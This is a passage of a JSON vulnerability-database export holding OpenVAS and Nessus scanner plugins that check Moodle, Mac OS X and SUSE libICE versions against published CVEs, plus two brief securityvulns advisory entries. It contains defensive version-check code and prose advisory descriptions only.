script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2018-1133\", \"CVE-2018-1134\", \"CVE-2018-1135\", \"CVE-2018-1136\", \"CVE-2018-1137\");\n\n script_name(\"Moodle 3.x Multiple Vulnerabilities - May'18 (Windows)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_moodle_cms_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"moodle/detected\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"Moodle CMS is prone to multiple vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Following vulnerabilities exist:\n\n - A Teacher creating a Calculated question can intentionally cause remote code execution on the server, aka eval injection.\n\n - Students who submitted assignments and exported them to portfolios can download any stored Moodle file\n by changing the download URL.\n\n - Students who posted on forums and exported the posts to portfolios can download any stored Moodle file\n by changing the download URL.\n\n - An authenticated user is allowed to add HTML blocks containing scripts to their Dashboard.\n This is normally not a security issue because a personal dashboard is visible to this user only.\n Through this security vulnerability,\n users can move such a block to other pages where they can be viewed by other users.\n\n - By substituting URLs in portfolios, users can instantiate any class.\n This can also be exploited by users who are logged in as guests to create a DDoS attack.\");\n script_tag(name:\"impact\", value:\"Successful exploitation can have effects ranging from Denial of Service, over file access to\n the attacker gaining complete control over the target system.\");\n script_tag(name:\"affected\", value:\"Moodle versions before 3.1.11, 3.2.0 through 3.2.8, 3.3.0 through 3.3.5 and 3.4.0 through 3.4.2.\");\n script_tag(name:\"solution\", value:\"Update to version 3.1.12, 3.2.9, 3.3.6 or 3.4.3 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=371199\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=371200\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=371201\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=371202\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=371203\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=371204\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:moodle:moodle\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) ) exit( 0 );\n\nversion = infos['version'];\npath = infos['location'];\n\nif( version_is_less( version: version, test_version: \"3.1.12\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.1.12\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.2.0\", test_version2: \"3.2.8\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.2.9\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.3.0\", test_version2: \"3.3.5\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.3.6\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.4.0\", test_version2: \"3.4.2\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.4.3\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-29T12:32:24", "bulletinFamily": "scanner", "description": "Moodle CMS is prone to multiple vulnerabilities.", "modified": "2018-10-26T00:00:00", "published": "2018-05-29T00:00:00", "id": "OPENVAS:1361412562310113200", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113200", "title": "Moodle 3.x Multiple Vulnerabilities - May'18 (Linux)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_moodle_mult_vuln_may18_04_lin.nasl 12120 2018-10-26 11:13:20Z mmartin $\n#\n# Moodle 3.x Multiple Vulnerabilities - May'18 (Linux)\n#\n# Authors:\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113200\");\n script_version(\"$Revision: 12120 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 13:13:20 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-29 10:06:08 +0200 (Tue, 29 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2018-1133\", \"CVE-2018-1134\", \"CVE-2018-1135\", \"CVE-2018-1136\", \"CVE-2018-1137\");\n\n script_name(\"Moodle 3.x Multiple Vulnerabilities - May'18 (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_moodle_cms_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"moodle/detected\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"Moodle CMS is prone to multiple vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Following vulnerabilities exist:\n\n - A Teacher creating a Calculated question can intentionally cause remote code execution on the server, aka eval injection.\n\n - Students who submitted assignments and exported them to portfolios can download any stored Moodle file\n by changing the download URL.\n\n - Students who posted on forums and exported the posts to portfolios can download any stored Moodle file\n by changing the download URL.\n\n - An authenticated user is allowed to add HTML blocks containing scripts to their Dashboard.\n This is normally not a security issue because a personal dashboard is visible to this user only.\n Through this security vulnerability,\n users can move such a block to other pages where they can be viewed by other users.\n\n - By substituting URLs in portfolios, users can instantiate any class.\n This can also be exploited by users who are logged in as guests to create a DDoS attack.\");\n script_tag(name:\"impact\", value:\"Successful exploitation can have effects ranging from Denial of Service, over file access to\n the attacker gaining complete control over the target system.\");\n script_tag(name:\"affected\", value:\"Moodle versions before 3.1.11, 3.2.0 through 3.2.8, 3.3.0 through 3.3.5 and 3.4.0 through 3.4.2.\");\n script_tag(name:\"solution\", value:\"Update to version 3.1.12, 3.2.9, 3.3.6 or 3.4.3 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=371199\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=371200\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=371201\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=371202\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=371203\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=371204\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:moodle:moodle\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) ) exit( 0 );\n\nversion = infos['version'];\npath = infos['location'];\n\nif( version_is_less( version: version, test_version: \"3.1.12\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.1.12\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.2.0\", test_version2: \"3.2.8\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.2.9\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.3.0\", test_version2: \"3.3.5\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.3.6\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.4.0\", test_version2: \"3.4.2\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.4.3\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-03T14:33:08", "bulletinFamily": "scanner", "description": "This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.", "modified": "2019-05-03T00:00:00", "published": "2015-04-24T00:00:00", "id": "OPENVAS:1361412562310805601", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805601", "title": "Apple Mac OS X Multiple Vulnerabilities-01 Apr15", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Mac OS X Multiple Vulnerabilities-01 Apr15\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805601\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2015-1130\", \"CVE-2015-1131\", \"CVE-2015-1132\", \"CVE-2015-1133\",\n \"CVE-2015-1134\", \"CVE-2015-1135\", \"CVE-2015-1136\", \"CVE-2015-1088\",\n \"CVE-2015-1089\", \"CVE-2015-1091\", \"CVE-2015-1093\", \"CVE-2015-1137\",\n \"CVE-2015-1138\", \"CVE-2015-1139\", \"CVE-2015-1140\", \"CVE-2015-1141\",\n \"CVE-2015-1142\", \"CVE-2015-1143\", \"CVE-2015-1144\", \"CVE-2015-1145\",\n \"CVE-2015-1146\", \"CVE-2015-1147\", \"CVE-2015-1148\", \"CVE-2015-1095\",\n \"CVE-2015-1098\", \"CVE-2015-1099\", \"CVE-2015-1100\", \"CVE-2015-1101\",\n \"CVE-2015-1102\", \"CVE-2015-1103\", \"CVE-2015-1104\", \"CVE-2015-1105\",\n \"CVE-2015-1117\", \"CVE-2015-1118\");\n script_bugtraq_id(73982, 73984, 72328, 73981);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-04-24 15:41:40 +0530 (Fri, 24 Apr 2015)\");\n script_name(\"Apple Mac OS X Multiple Vulnerabilities-01 Apr15\");\n\n script_tag(name:\"summary\", value:\"This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists. For details refer\n reference section.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow local\n attacker to execute arbitrary code with system privilege, man-in-the-middle\n attack, remote attacker to bypass network filters, to cause a denial of\n service, a context-dependent attacker to corrupt memory and cause a denial of\n service, bypass signature validation or potentially execute arbitrary code, a\n local application to gain elevated privileges by using a compromised service\n and some unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X versions 10.8 through\n 10.8.5, 10.9 through 10.9.5, and 10.10.x through 10.10.2\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Mac OS X version 10.10.3\n or later or apply security update 2015-004 for 10.8 and 10.9 versions. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://support.apple.com/kb/HT204659\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.([89]|10)\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^10\\.([89]|10)\" || \"Mac OS X\" >!< osName){\n exit(0);\n}\n\nif((osVer == \"10.8.5\") || (osVer == \"10.9.5\"))\n{\n buildVer = get_kb_item(\"ssh/login/osx_build\");\n if(!buildVer){\n exit(0);\n }\n\n if(osVer == \"10.8.5\" && version_is_less(version:buildVer, test_version:\"12F2518\"))\n {\n fix = \"Apply Security Update 2015-004\";\n osVer = osVer + \" Build \" + buildVer;\n }\n\n else if(osVer == \"10.9.5\" && version_is_less(version:buildVer, test_version:\"13F1077\"))\n {\n fix = \"Apply Security Update 2015-004\";\n osVer = osVer + \" Build \" + buildVer;\n }\n}\n\nif(osVer =~ \"^10\\.8\")\n{\n if(version_is_less(version:osVer, test_version:\"10.8.5\")){\n fix = \"Upgrade to latest OS release 10.8.5 and apply patch from vendor\";\n }\n}\nelse if(osVer =~ \"^10\\.9\")\n{\n if(version_is_less(version:osVer, test_version:\"10.9.5\")){\n fix = \"Upgrade to latest OS release 10.9.5 and apply patch from vendor\";\n }\n}\n\nelse if(osVer =~ \"^10\\.10\")\n{\n if(version_is_less(version:osVer, test_version:\"10.10.3\")){\n fix = \"10.10.3\";\n }\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:osVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:31:42", "bulletinFamily": "scanner", "description": "This update for libICE fixes the following issues :\n\n - CVE-2017-2626: Creation of the ICE auth session cookies used insufficient randomness, making these cookies predictable. A more random generation method has been implemented. (boo#1025068)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-30T00:00:00", "id": "SUSE_SU-2017-1835-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=101390", "published": "2017-07-12T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : libICE (SUSE-SU-2017:1835-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1835-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101390);\n script_version(\"3.6\");\n script_cvs_date(\"Date: 2018/11/30 10:54:50\");\n\n script_cve_id(\"CVE-2017-2626\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : libICE (SUSE-SU-2017:1835-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libICE fixes the following issues :\n\n - CVE-2017-2626: Creation of the ICE auth session cookies\n used insufficient randomness, making these cookies\n predictable. A more random generation method has been\n implemented. (boo#1025068)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1025068\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2626/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171835-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?77b78e34\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2017-1134=1\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2017-1134=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-1134=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2017-1134=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libICE-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libICE6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libICE6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! ereg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libICE-debugsource-1.0.8-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libICE6-1.0.8-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libICE6-debuginfo-1.0.8-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libICE6-32bit-1.0.8-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libICE6-debuginfo-32bit-1.0.8-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libICE-debugsource-1.0.8-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libICE6-1.0.8-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libICE6-32bit-1.0.8-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libICE6-debuginfo-1.0.8-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libICE6-debuginfo-32bit-1.0.8-10.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libICE\");\n}\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:15", "bulletinFamily": "software", "description": "\u041d\u0435 \u0441\u0431\u0440\u0430\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f egid kmem \u043f\u0440\u0438 \u0432\u044b\u0437\u043e\u0432\u0435 \u0432\u043d\u0435\u0448\u043d\u0435\u0433\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f.", "modified": "2001-04-17T00:00:00", "published": "2001-04-17T00:00:00", "id": "SECURITYVULNS:VULN:1134", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:1134", "title": "\u0414\u044b\u0440\u043a\u0430 \u0432 bubblemon &#40;egid kmem&#41;", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:04", "bulletinFamily": "software", "description": "ping.cgi, traceroute.cgi and finger.cgi have the same bug ;&#41;\r\n\r\ngrtz,\r\nMarco van Berkum\r\n\r\n--\r\nSex is like hacking. You get in, you get out,\r\nand you hope you didn&#39;t leave something behind\r\nthat can be traced back to you.\r\n\r\nMarco van Berkum, System Operator/Security Analyst OBIT b.v.\r\nRIPEHANDLE: MB17300-RIPE", "modified": "2001-01-06T00:00:00", "published": "2001-01-06T00:00:00", "id": "SECURITYVULNS:DOC:1134", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:1134", "title": "Fastgraf Metacharacterbug&#40;2&#41;", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}